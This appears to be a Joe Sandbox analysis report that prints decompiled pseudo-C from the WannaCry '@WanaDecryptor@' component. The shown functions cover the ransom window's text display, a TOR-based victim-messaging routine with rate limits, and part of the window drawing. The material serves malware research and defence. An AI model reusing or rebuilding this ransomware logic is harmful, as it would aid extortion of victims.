                                                      0x00000000
                                                      0x004094a3
                                                      0x00409444
                                                      0x00409389

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414#540#5875#6170#800#860$#2818#2860#3874ExtentMessageObjectPoint32SendTextViewportWindow_ftol
                                                      • String ID: %d%%$gfff$pgA$pgA$tgA$tgA$xgA$xgA$|gA$|gA$[A
                                                      • API String ID: 2923375784-3599407550
                                                      • Opcode ID: 7e6b703d67e7595773a4bd55965276fd3caf6c6c14634650179ea244f19e8907
                                                      • Instruction ID: e7c60e05cab477c723c52aa9b6021990c4bcf2d63edfa6d200c8e4e6b3644932
                                                      • Opcode Fuzzy Hash: 7e6b703d67e7595773a4bd55965276fd3caf6c6c14634650179ea244f19e8907
                                                      • Instruction Fuzzy Hash: D312E2B0208381DFD714CF69C484A9BBBE5BBC8304F148A2EF89997391D774E945CB66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 72%
                                                      			E00405230(void* __ecx) {
                                                      				RECT* _v12;
                                                      				char _v20;
                                                      				char _v24;
                                                      				char _v28;
                                                      				char _v32;
                                                      				char _v36;
                                                      				char _v40;
                                                      				intOrPtr _v44;
                                                      				char _v48;
                                                      				char _v52;
                                                      				void* _v56;
                                                      				void* _v60;
                                                      				void* _v64;
                                                      				void* _v68;
                                                      				int _t98;
                                                      				int _t99;
                                                      				int _t104;
                                                      				char* _t106;
                                                      				void* _t109;
                                                      				char* _t110;
                                                      				signed int _t113;
                                                      				int _t114;
                                                      				void* _t117;
                                                      				char* _t118;
                                                      				char _t119;
                                                      				char* _t120;
                                                      				signed int _t122;
                                                      				void* _t123;
                                                      				int _t126;
                                                      				int _t127;
                                                      				int _t130;
                                                      				void* _t132;
                                                      				signed int _t136;
                                                      				signed int _t142;
                                                      				intOrPtr _t163;
                                                      				intOrPtr _t179;
                                                      				signed int _t182;
                                                      				signed int _t198;
                                                      				void* _t199;
                                                      				signed int _t200;
                                                      				void* _t201;
                                                      				intOrPtr* _t205;
                                                      				void* _t208;
                                                      				intOrPtr* _t212;
                                                      				intOrPtr* _t213;
                                                      				intOrPtr _t215;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413918);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t215;
                                                      				_t208 = __ecx;
                                                      				_t182 =  *(__ecx + 0x70);
                                                      				if(_t182 != 1) {
                                                      					if(__eflags <= 0) {
                                                      						L33:
                                                      						_t98 = InvalidateRect( *(_t208 + 0x20), 0, 1);
                                                      						L34:
                                                      						 *[fs:0x0] = _v12;
                                                      						return _t98;
                                                      					}
                                                      					__eflags =  *((char*)(__ecx + 0x4b)) - 1;
                                                      					if( *((char*)(__ecx + 0x4b)) != 1) {
                                                      						L15:
                                                      						_t99 =  *(_t208 + 0x78);
                                                      						__eflags = _t99 - 3;
                                                      						if(_t99 != 3) {
                                                      							__eflags = _t99 - 2;
                                                      							if(_t99 != 2) {
                                                      								__eflags = _t99;
                                                      								if(_t99 != 0) {
                                                      									__eflags = _t99 - 1;
                                                      									if(_t99 != 1) {
                                                      										goto L33;
                                                      									}
                                                      									_t212 = _t208 + 0x44;
                                                      									_t198 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
                                                      									_t136 =  *(_t208 + 0x74);
                                                      									asm("cdq");
                                                      									_t98 = _t198 / _t136;
                                                      									__eflags = _t98;
                                                      									if(_t98 == 0) {
                                                      										goto L34;
                                                      									}
                                                      									__eflags = _t198 - _t136;
                                                      									if(_t198 < _t136) {
                                                      										goto L34;
                                                      									}
                                                      									_t199 = 0;
                                                      									__eflags = _t98;
                                                      									if(_t98 <= 0) {
                                                      										goto L33;
                                                      									}
                                                      									_t126 = _t98;
                                                      									do {
                                                      										_push( *((intOrPtr*)(_t136 + _t199 +  *_t212 - 1)));
                                                      										_push(_t199);
                                                      										L00412E12();
                                                      										_push(1);
                                                      										_push( *(_t208 + 0x74) + _t199);
                                                      										L00412E0C();
                                                      										_t136 =  *(_t208 + 0x74);
                                                      										_t199 = _t199 + _t136;
                                                      										_t126 = _t126 - 1;
                                                      										__eflags = _t126;
                                                      									} while (_t126 != 0);
                                                      									goto L33;
                                                      								}
                                                      								_t213 = _t208 + 0x44;
                                                      								_t142 =  *(_t208 + 0x74);
                                                      								_t200 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
                                                      								asm("cdq");
                                                      								_t104 = _t200 / _t142;
                                                      								__eflags = _t104;
                                                      								if(_t104 == 0) {
                                                      									L22:
                                                      									_t104 = 1;
                                                      									L23:
                                                      									_t201 = 0;
                                                      									__eflags = _t104;
                                                      									if(_t104 <= 0) {
                                                      										goto L33;
                                                      									}
                                                      									_t127 = _t104;
                                                      									do {
                                                      										_push( *((intOrPtr*)(_t201 +  *_t213)));
                                                      										_push(_t142 + _t201);
                                                      										L00412E12();
                                                      										_push(1);
                                                      										_push(_t201);
                                                      										L00412E0C();
                                                      										_t142 =  *(_t208 + 0x74);
                                                      										_t201 = _t201 + _t142;
                                                      										_t127 = _t127 - 1;
                                                      										__eflags = _t127;
                                                      									} while (_t127 != 0);
                                                      									goto L33;
                                                      								}
                                                      								__eflags = _t200 - _t142;
                                                      								if(_t200 >= _t142) {
                                                      									goto L23;
                                                      								}
                                                      								goto L22;
                                                      							}
                                                      							_t106 =  &_v32;
                                                      							_push( *(_t208 + 0x74));
                                                      							_push(_t106);
                                                      							L00412E24();
                                                      							_push( *(_t208 + 0x74));
                                                      							_push( &_v24);
                                                      							_v12 = 8;
                                                      							L00412E30();
                                                      							_push( &_v48);
                                                      							_push(_t106);
                                                      							_push( &_v36);
                                                      							_v20 = 9;
                                                      							L00412E18();
                                                      							_push(_t106);
                                                      							_v32 = 0xa;
                                                      							L00412D9A();
                                                      							_v36 = 9;
                                                      							L00412CC2();
                                                      							_v36 = 8;
                                                      							L00412CC2();
                                                      							_v36 = 0xffffffff;
                                                      							L00412CC2();
                                                      							goto L33;
                                                      						}
                                                      						_push( *(_t208 + 0x74));
                                                      						_push( &_v36);
                                                      						L00412E1E();
                                                      						_v12 = 5;
                                                      						_t109 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8) -  *(_t208 + 0x74);
                                                      						_push(_t109);
                                                      						_push( &_v36);
                                                      						L00412E24();
                                                      						_push(_t109);
                                                      						_t110 =  &_v52;
                                                      						_push(_t110);
                                                      						_push( &_v40);
                                                      						_v20 = 6;
                                                      						L00412E18();
                                                      						_push(_t110);
                                                      						_v32 = 7;
                                                      						L00412D9A();
                                                      						_v36 = 6;
                                                      						L00412CC2();
                                                      						_v36 = 5;
                                                      						L00412CC2();
                                                      						_v36 = 0xffffffff;
                                                      						L00412CC2();
                                                      						goto L33;
                                                      					}
                                                      					_t163 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
                                                      					_t113 =  *(__ecx + 0x74) * _t182;
                                                      					__eflags = _t163 - _t113;
                                                      					if(_t163 >= _t113) {
                                                      						goto L15;
                                                      					}
                                                      					_t114 = _t113 - _t163;
                                                      					__eflags = _t114;
                                                      					if(_t114 <= 0) {
                                                      						goto L15;
                                                      					}
                                                      					_t130 = _t114;
                                                      					do {
                                                      						_push( *((intOrPtr*)(__ecx + 0x40)));
                                                      						L00412E36();
                                                      						_t130 = _t130 - 1;
                                                      						__eflags = _t130;
                                                      					} while (_t130 != 0);
                                                      					goto L15;
                                                      				}
                                                      				if( *((intOrPtr*)(__ecx + 0x4b)) != _t182) {
                                                      					L6:
                                                      					_t205 = _t208 + 0x44;
                                                      					if( *(_t208 + 0x78) != 0) {
                                                      						_t117 =  *((intOrPtr*)( *_t205 - 8)) - 1;
                                                      						_push(_t117);
                                                      						_push( &_v36);
                                                      						L00412E24();
                                                      						_t118 =  &_v36;
                                                      						_push(1);
                                                      						_push(_t118);
                                                      						_v12 = 2;
                                                      						L00412E1E();
                                                      						_push(_t117);
                                                      						_push(_t118);
                                                      						_push( &_v40);
                                                      						_v20 = 3;
                                                      						L00412E18();
                                                      						_push(_t118);
                                                      						_v32 = 4;
                                                      						L00412D9A();
                                                      						_v36 = 3;
                                                      						L00412CC2();
                                                      						_v36 = 2;
                                                      						L00412CC2();
                                                      						_v36 = 0xffffffff;
                                                      						L00412CC2();
                                                      					} else {
                                                      						_push(1);
                                                      						_push( &_v24);
                                                      						_t119 =  *((intOrPtr*)( *_t205));
                                                      						_v36 = _t119;
                                                      						L00412E30();
                                                      						_v12 = 0;
                                                      						_push(_v44);
                                                      						_push(_t119);
                                                      						_t120 =  &_v36;
                                                      						_push(_t120);
                                                      						L00412E2A();
                                                      						_push(_t120);
                                                      						_v24 = 1;
                                                      						L00412D9A();
                                                      						_v28 = 0;
                                                      						L00412CC2();
                                                      						_v28 = 0xffffffff;
                                                      						L00412CC2();
                                                      					}
                                                      					goto L33;
                                                      				}
                                                      				_t179 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
                                                      				_t122 =  *(__ecx + 0x74);
                                                      				if(_t179 >= _t122) {
                                                      					goto L6;
                                                      				}
                                                      				_t123 = _t122 - _t179;
                                                      				if(_t123 <= 0) {
                                                      					goto L6;
                                                      				}
                                                      				_t132 = _t123;
                                                      				do {
                                                      					_push( *((intOrPtr*)(__ecx + 0x40)));
                                                      					L00412E36();
                                                      					_t132 = _t132 - 1;
                                                      				} while (_t132 != 0);
                                                      				goto L6;
                                                      			}

                                                      APIs
                                                      • #940.MFC42(?), ref: 0040527D
                                                      • #4277.MFC42(?,00000001), ref: 004052A0
                                                      • #923.MFC42(?,00000000,?), ref: 004052B8
                                                      • #858.MFC42(00000000,?,00000000,?), ref: 004052C5
                                                      • #800.MFC42(00000000,?,00000000,?), ref: 004052D3
                                                      • #800.MFC42(00000000,?,00000000,?), ref: 004052E4
                                                      • #4129.MFC42(?,?), ref: 004052FC
                                                      • #5710.MFC42 ref: 00405314
                                                      • #922.MFC42(?,00000000,00000000), ref: 00405326
                                                      • #858.MFC42(00000000,?,00000000,00000000), ref: 00405333
                                                      • #800.MFC42(00000000,?,00000000,00000000), ref: 00405340
                                                      • #800.MFC42(00000000,?,00000000,00000000), ref: 0040534E
                                                      • #800.MFC42(00000000,?,00000000,00000000), ref: 0040535F
                                                      • #940.MFC42(?), ref: 00405396
                                                      • #5710.MFC42(?,?), ref: 004053B8
                                                      • #4129.MFC42(?,?,?,?), ref: 004053D7
                                                      • #922.MFC42(?,?,00000000,?,?,?,?), ref: 004053ED
                                                      • #858.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 004053FA
                                                      • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405407
                                                      • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405415
                                                      • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405426
                                                      • #4129.MFC42(?,?), ref: 00405443
                                                      • #4277.MFC42(?,?,?,?), ref: 0040545B
                                                      • #922.MFC42(?,00000000,?,?,?,?,?), ref: 00405471
                                                      • #858.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040547E
                                                      • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040548B
                                                      • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 00405499
                                                      • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 004054AA
                                                      • #6778.MFC42(?,00000001), ref: 004054EA
                                                      • #6648.MFC42(00000000,00000001,?,00000001), ref: 004054F4
                                                      • #6778.MFC42(00000000,?), ref: 00405536
                                                      • #6648.MFC42(?,00000001,00000000,?), ref: 00405545
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0040555A
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$#858$#4129#922$#4277#5710#6648#6778#940$#923InvalidateRect
                                                      • String ID:
                                                      • API String ID: 2121400562-0
                                                      • Opcode ID: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
                                                      • Instruction ID: 4ea7c19ebb0ecad4eacefd8b4ebc091e45acf9db756171f3a68d6c32b1a6cadd
                                                      • Opcode Fuzzy Hash: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
                                                      • Instruction Fuzzy Hash: A4A1B770204B81AFC714DB29C590A6FB7E6EFD4304F040A1EF596D3391D7B8E8558B66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 56%
                                                      			E004082C0(void* __ecx) {
                                                      				void* __ebp;
                                                      				signed int _t44;
                                                      				void* _t45;
                                                      				void* _t47;
                                                      				signed int _t48;
                                                      				signed int _t51;
                                                      				signed int _t56;
                                                      				signed int _t58;
                                                      				signed int _t59;
                                                      				void* _t60;
                                                      				signed int _t65;
                                                      				signed int _t90;
                                                      				signed int _t91;
                                                      				signed int _t104;
                                                      				intOrPtr* _t106;
                                                      				struct _IO_FILE* _t107;
                                                      				signed int _t108;
                                                      				void* _t111;
                                                      				intOrPtr _t114;
                                                      				void* _t115;
                                                      				void* _t116;
                                                      				void* _t118;
                                                      				void* _t120;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413FCE);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t114;
                                                      				_t115 = _t114 - 0x8c;
                                                      				_t111 = __ecx;
                                                      				 *((intOrPtr*)(_t115 + 0xa4)) = 0;
                                                      				_t44 =  *( *((intOrPtr*)(_t115 + 0xac)) - 8);
                                                      				if(_t44 > 0x3e8) {
                                                      					_push(0x3e8);
                                                      					_push(0);
                                                      					_push(_t115 + 0x14);
                                                      					L00412F6E();
                                                      					_push(_t44);
                                                      					 *((char*)(_t115 + 0xa8)) = 1;
                                                      					L00412D9A();
                                                      					 *((char*)(_t115 + 0xa4)) = 0;
                                                      					L00412CC2();
                                                      				}
                                                      				if( *( *((intOrPtr*)(_t115 + 0xac)) - 8) >= 0xa) {
                                                      					_t106 = __imp__time;
                                                      					_t45 =  *_t106(0);
                                                      					_t90 =  *0x4218a8; // 0x0
                                                      					_t116 = _t115 + 4;
                                                      					__eflags = _t45 - _t90 - 0xb4;
                                                      					if(_t45 - _t90 >= 0xb4) {
                                                      						L13:
                                                      						_t47 =  *_t106(0);
                                                      						_t91 =  *0x4218a8; // 0x0
                                                      						_t116 = _t116 + 4;
                                                      						_t48 = _t47 - _t91;
                                                      						__eflags = _t48 - 0xe10;
                                                      						if(_t48 <= 0xe10) {
                                                      							L9:
                                                      							__eflags =  *0x4218ac - 3; // 0x0
                                                      							if(__eflags < 0) {
                                                      								L15:
                                                      								 *((intOrPtr*)(_t116 + 0x14)) = 0;
                                                      								memset(_t116 + 0x18, 0, 0x21 << 2);
                                                      								_t51 = fopen("00000000.res", "rb");
                                                      								_t107 = _t51;
                                                      								_t118 = _t116 + 0x14;
                                                      								__eflags = _t107;
                                                      								if(_t107 != 0) {
                                                      									fread(_t118 + 0x1c, 0x88, 1, _t107);
                                                      									fclose(_t107);
                                                      									E0040BE90("s.wnry", _t111 + 0x6ea, _t111 + 0x74e);
                                                      									_push(0);
                                                      									_push( *((intOrPtr*)(_t118 + 0xcc)));
                                                      									_push(_t118 + 0x38);
                                                      									_push(_t111 + 0x5f0);
                                                      									_t56 = E0040C060( *((intOrPtr*)(_t118 + 0xcc)), __eflags);
                                                      									_t118 = _t118 + 0x30;
                                                      									_t108 = _t56;
                                                      									E0040C670();
                                                      									_t58 =  *(_t118 + 0xb0);
                                                      									__eflags = _t108;
                                                      									if(_t108 < 0) {
                                                      										__eflags = _t58;
                                                      										if(_t58 != 0) {
                                                      											_push(0);
                                                      											_push(0x30);
                                                      											_push("Failed to send your message!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
                                                      											L00412CC8();
                                                      										}
                                                      									} else {
                                                      										__eflags = _t58;
                                                      										if(_t58 != 0) {
                                                      											L00412CC8();
                                                      											__imp__time(0, "Your message has been sent successfully!", 0x40, 0);
                                                      											_t118 = _t118 + 4;
                                                      											 *0x4218a8 = _t58;
                                                      										}
                                                      									}
                                                      									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
                                                      									L00412CC2();
                                                      									_t59 = _t108;
                                                      								} else {
                                                      									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
                                                      									L00412CC2();
                                                      									_t59 = _t51 | 0xffffffff;
                                                      								}
                                                      								L23:
                                                      								 *[fs:0x0] =  *((intOrPtr*)(_t118 + 0x9c));
                                                      								return _t59;
                                                      							}
                                                      							__eflags =  *(_t116 + 0xb0);
                                                      							if( *(_t116 + 0xb0) != 0) {
                                                      								L00412DA6();
                                                      								 *((char*)(_t116 + 0xa8)) = 2;
                                                      								_t60 =  *_t106(0);
                                                      								_t104 =  *0x4218a8; // 0x0
                                                      								_t120 = _t116 + 4;
                                                      								__eflags = 0x3d;
                                                      								_push(0x3d - ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5) + ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5 >> 0x1f));
                                                      								_push("You are sending too many mails! Please try again %d minutes later.");
                                                      								_push(_t120 + 0x10);
                                                      								L00412E00();
                                                      								_t48 =  *(_t120 + 0x1c);
                                                      								_t116 = _t120 + 0xc;
                                                      								_push(0);
                                                      								_push(0);
                                                      								_push(_t48);
                                                      								L00412CC8();
                                                      								 *((char*)(_t116 + 0xa4)) = 0;
                                                      								L00412CC2();
                                                      							}
                                                      							 *((intOrPtr*)(_t116 + 0xa4)) = 0xffffffff;
                                                      							L00412CC2();
                                                      							_t59 = _t48 | 0xffffffff;
                                                      							goto L23;
                                                      						}
                                                      						 *0x4218ac = 0;
                                                      						goto L15;
                                                      					}
                                                      					_t65 =  *0x4218ac; // 0x0
                                                      					__eflags = _t65 - 3;
                                                      					if(_t65 >= 3) {
                                                      						goto L13;
                                                      					}
                                                      					_t48 = _t65 + 1;
                                                      					__eflags = _t48;
                                                      					 *0x4218ac = _t48;
                                                      					goto L9;
                                                      				}
                                                      				if( *((intOrPtr*)(_t115 + 0xb0)) != 0) {
                                                      					_push(0);
                                                      					_push(0);
                                                      					_push("Too short message!");
                                                      					L00412CC8();
                                                      				}
                                                      				 *((intOrPtr*)(_t115 + 0xa4)) = 0xffffffff;
                                                      				L00412CC2();
                                                      				_t59 = _t44 | 0xffffffff;
                                                      				goto L23;
                                                      			}

                                                      APIs
                                                      • #4278.MFC42(000003E8,00000000,000003E8,?,?,77005C80), ref: 0040830D
                                                      • #858.MFC42 ref: 00408322
                                                      • #800.MFC42 ref: 00408332
                                                      • #1200.MFC42(Too short message!,00000000,00000000,?,?,77005C80), ref: 00408354
                                                      • #800.MFC42 ref: 0040836B
                                                      • time.MSVCRT ref: 0040837F
                                                      • #540.MFC42 ref: 004083C8
                                                      • time.MSVCRT ref: 004083D6
                                                      • #2818.MFC42(?,You are sending too many mails! Please try again %d minutes later.,0000003D,00000000), ref: 0040840A
                                                      • #1200.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408419
                                                      • #800.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408429
                                                      • #800.MFC42 ref: 00408440
                                                      • time.MSVCRT ref: 0040844E
                                                      • fopen.MSVCRT ref: 00408487
                                                      • #800.MFC42 ref: 004084A8
                                                      • fread.MSVCRT ref: 004084C2
                                                      • fclose.MSVCRT ref: 004084C9
                                                      • #1200.MFC42(Your message has been sent successfully!,00000040,00000000), ref: 00408522
                                                      • time.MSVCRT ref: 00408528
                                                      • #1200.MFC42(Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!,00000030,00000000), ref: 00408544
                                                      • #800.MFC42 ref: 0040855B
                                                      Strings
                                                      • Too short message!, xrefs: 0040834F
                                                      • s.wnry, xrefs: 004084DD
                                                      • Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 0040853F
                                                      • 00000000.res, xrefs: 00408480
                                                      • Your message has been sent successfully!, xrefs: 0040851D
                                                      • You are sending too many mails! Please try again %d minutes later., xrefs: 00408404
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$#1200time$#2818#4278#540#858fclosefopenfread
                                                      • String ID: 00000000.res$Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$Too short message!$You are sending too many mails! Please try again %d minutes later.$Your message has been sent successfully!$s.wnry
                                                      • API String ID: 1233543560-382338106
                                                      • Opcode ID: 6aef2977620d67d742a0f30d3b6c329b2d4c4f80cce0edf1bcad665571c82898
                                                      • Instruction ID: 9ef4e74ff6f5855000ff98dc085b89da37e67c7abdef0d08bf307c22ead08a72
                                                      • Opcode Fuzzy Hash: 6aef2977620d67d742a0f30d3b6c329b2d4c4f80cce0edf1bcad665571c82898
                                                      • Instruction Fuzzy Hash: D6610371604340EFD330EB28DD81BEFB795AB90324F444A3EF199932D0DB78594586AB
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 79%
                                                      			E004086E0(intOrPtr* __ecx, void* __ebp, signed long long __fp0) {
                                                      				struct HBRUSH__* _v8;
                                                      				char _v16;
                                                      				char _v28;
                                                      				intOrPtr _v36;
                                                      				char _v52;
                                                      				char _v76;
                                                      				char _v88;
                                                      				intOrPtr _v120;
                                                      				intOrPtr _v124;
                                                      				struct HDC__* _v128;
                                                      				signed int _v132;
                                                      				void* _v136;
                                                      				char _v144;
                                                      				signed int _v148;
                                                      				struct HBRUSH__* _v152;
                                                      				intOrPtr _v156;
                                                      				struct HBRUSH__* _v160;
                                                      				char _v164;
                                                      				void* _v168;
                                                      				long _v172;
                                                      				char _v176;
                                                      				char _v180;
                                                      				struct tagRECT _v196;
                                                      				intOrPtr _v200;
                                                      				char* _v204;
                                                      				signed int _v208;
                                                      				signed int _v212;
                                                      				char _v216;
                                                      				intOrPtr _v220;
                                                      				char _v224;
                                                      				char _v228;
                                                      				struct HBRUSH__* _v232;
                                                      				intOrPtr _v236;
                                                      				char _v240;
                                                      				intOrPtr _v244;
                                                      				intOrPtr _v248;
                                                      				struct HDC__* _v252;
                                                      				char _v256;
                                                      				struct HBRUSH__* _v260;
                                                      				struct HBRUSH__* _v264;
                                                      				char _v268;
                                                      				intOrPtr _v272;
                                                      				intOrPtr _v276;
                                                      				char _v280;
                                                      				struct HBRUSH__* _v284;
                                                      				struct HBRUSH__* _v288;
                                                      				char _v292;
                                                      				intOrPtr _v300;
                                                      				char _v324;
                                                      				signed int _t146;
                                                      				intOrPtr _t148;
                                                      				signed int _t150;
                                                      				void* _t152;
                                                      				intOrPtr _t155;
                                                      				char _t163;
                                                      				char* _t165;
                                                      				RECT* _t177;
                                                      				struct HBRUSH__* _t182;
                                                      				intOrPtr _t206;
                                                      				signed int _t276;
                                                      				intOrPtr _t277;
                                                      				intOrPtr* _t281;
                                                      				void* _t283;
                                                      				long _t284;
                                                      				intOrPtr _t286;
                                                      				intOrPtr _t291;
                                                      				signed long long _t299;
                                                      				signed long long _t301;
                                                      				signed long long _t303;
                                                      
                                                      				_t299 = __fp0;
                                                      				_t283 = __ebp;
                                                      				_push(0xffffffff);
                                                      				_push(E00414055);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t286;
                                                      				_t281 = __ecx;
                                                      				_push(__ecx);
                                                      				L00412DD0();
                                                      				_v8 = 0;
                                                      				GetClientRect( *(__ecx + 0x20),  &(_v196.right));
                                                      				_v172 = SendMessageA( *(_t281 + 0x20), 0x408, 0, 0);
                                                      				_push( &_v164);
                                                      				_push( &_v168);
                                                      				L00412FFE();
                                                      				L00412E54();
                                                      				_v16 = 1;
                                                      				E00407640( &_v240);
                                                      				_v240 = 0x41675c;
                                                      				_t206 = _v120;
                                                      				_t146 = 0 | _t206 == 0x00000000;
                                                      				_v16 = 2;
                                                      				_v256 = 0x4166e0;
                                                      				_v228 =  &_v132;
                                                      				_v232 = 0;
                                                      				_v208 = _t146;
                                                      				if(_t146 == 0) {
                                                      					_v244 = _t206;
                                                      					_v248 = _v124;
                                                      					_v252 = _v128;
                                                      				} else {
                                                      					 *((intOrPtr*)(_v132 + 0x58))( &_v224);
                                                      					asm("sbb eax, eax");
                                                      					_push(CreateCompatibleDC( ~( &_v136) & _v132));
                                                      					L00412E4E();
                                                      					E00409E70( &_v252,  &_v144, _v228 - _v236, _v224 - _v232);
                                                      					_t35 =  &_v264; // 0x41675c
                                                      					_v260 = E00409F10( &_v280, _t35);
                                                      					_push(_v248);
                                                      					_push(_v252);
                                                      					_push( &_v76);
                                                      					L00412FF8();
                                                      				}
                                                      				_v16 = 3;
                                                      				_v204 =  &_v256;
                                                      				_t148 =  *((intOrPtr*)(_t281 + 0x5c));
                                                      				_t291 = _t148;
                                                      				if(_t291 == 0) {
                                                      					_push( *((intOrPtr*)(_t281 + 0x58)));
                                                      					_push( &_v196);
                                                      					L00412FF2();
                                                      				} else {
                                                      					if(_t291 != 0) {
                                                      						_t182 =  *(_t148 + 4);
                                                      					} else {
                                                      						_t182 = 0;
                                                      					}
                                                      					FillRect(_v252,  &_v196, _t182);
                                                      				}
                                                      				_push(_t281 + 0x74);
                                                      				L00412FEC();
                                                      				_t150 = _v196.top;
                                                      				if(_t150 < _v196.right.left || _t150 > _v196.bottom) {
                                                      					_v268 = 0x4166e0;
                                                      					_v28 = 5;
                                                      					if(_v220 == 0) {
                                                      						_v260 = 0;
                                                      						_v264 = 0;
                                                      					} else {
                                                      						_t153 = _v232;
                                                      						E00409F80(_v240, _v236, _v232, _v228 - _v236, _v224 - _v232,  &_v268, _v236, _t153, 0xcc0020);
                                                      						_t155 = _v276;
                                                      						if(_t155 != 0) {
                                                      							_push( *((intOrPtr*)(_t155 + 4)));
                                                      							_push(_v264);
                                                      							L00412E48();
                                                      						} else {
                                                      							_push(0);
                                                      							_push(_v264);
                                                      							L00412E48();
                                                      						}
                                                      					}
                                                      					_v28 = 4;
                                                      				} else {
                                                      					L00412FE6();
                                                      					_v212 = _t150;
                                                      					_t276 = _t150 & 0x00008000;
                                                      					_v148 = _t150 & 0x00002000;
                                                      					_v180 = 0;
                                                      					_v176 = 0;
                                                      					_v168 = 0;
                                                      					_v164 = 0;
                                                      					_v160 = 0;
                                                      					_v152 = 0;
                                                      					if((_t150 & 0x00000004) == 0) {
                                                      						_v156 = _v200 - _v208;
                                                      					} else {
                                                      						_v156 = _v196.left - _v204;
                                                      					}
                                                      					asm("fild dword [esp+0x80]");
                                                      					_push(_t283);
                                                      					_t284 = _v196.right.left;
                                                      					_t163 = _v196.top - _t284;
                                                      					_v272 = _v196.bottom - _t284;
                                                      					asm("fild dword [esp+0x10]");
                                                      					_v272 = _t163;
                                                      					asm("fild dword [esp+0x10]");
                                                      					_t301 = _t299 * st2 / st1;
                                                      					L0041304A();
                                                      					_v172 = _t163;
                                                      					if(_t276 == 0) {
                                                      						st0 = _t301;
                                                      						st0 = _t301;
                                                      					} else {
                                                      						_v272 =  *((intOrPtr*)(_t281 + 0x68)) - _t284;
                                                      						asm("fild dword [esp+0x10]");
                                                      						_t303 = _t301 * st2 / st1;
                                                      						L0041304A();
                                                      						st0 = _t303;
                                                      						st0 = _t303;
                                                      						_v180 = _t163;
                                                      					}
